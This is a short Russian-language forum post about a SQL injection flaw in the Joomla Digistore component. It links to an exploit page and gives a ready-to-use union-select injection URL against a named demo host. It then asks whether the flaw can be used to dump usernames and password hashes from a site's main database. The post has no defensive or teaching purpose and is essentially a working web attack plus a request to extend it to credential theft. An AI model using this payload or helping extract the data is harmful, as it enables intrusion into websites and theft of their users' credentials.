уязвимость (SQL inj) Joomla в компоненте Digistore

http://www.exploitsdownload.com/exploit/na/joomla-digistore-sql-injection

http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digi storeProducts&task=list&cid[]=-2/**/union/**/select/**/user(),user(),user(),version(),user(),user()

Объясните пожалуйста, при помощи этой уязвимости реально слить хэши и ники из основной БД сайта?